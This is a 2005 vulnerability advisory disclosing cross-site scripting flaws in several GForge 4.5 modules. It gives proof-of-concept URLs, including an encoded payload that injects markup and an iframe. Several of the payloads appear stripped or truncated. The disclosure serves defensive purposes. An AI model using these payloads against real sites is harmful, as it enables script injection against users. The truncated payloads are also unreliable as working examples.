--------------------------------------------------------------------------- Various Vulnerabilities in GForge --------------------------------------------------------------------------- Author: Jose Antonio Coret (Joxean Koret) Date: 2005 Location: Basque Country --------------------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ GForge - 4.5 (Current) GForge has tools to help your team collaborate, like message forums and mailing lists; tools to create and control access to Source Code Management repositories like CVS and Subversion. GForge automatically creates a repository and controls access to it depending on the role settings of the project. Web : http://gforge.org/ --------------------------------------------------------------------------- A) Cross Site Scripting Vulnerabilities ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1.- In the Forum Module: http://[target]/forum/forum.php?forum_id="> http://[target]/forum/forum.php?group_id="> (NOTE: The group_id parameter is ALWAYS vulnerable.) 2.- In the Task Module: http://[target]/pm/task.php?func=detailtask&project_task_id=">

hi!

&group_id=1&group_project_id=3 3.- In the Snippets Module: http://[target]/snippet/detail.php?type=snippet&id=21">

hi!!!

in the search field and press enter or try the following URL: http://[target]/search/?type_of_search=soft&words=%22%3E%3Ch1%3EHi%21% 3C%2Fh1%3E%3Ciframe+src%3Dhttp%3A%2F%2Fslashdot.org%3E%3C%2Fiframe% 3E&Search=Search 5.- In other modules: http://[target]//frs/admin/qrs.php?group_id="> http://[target]/notepad.php?form=parent;%0d%0a-->%0d% 0a

hi!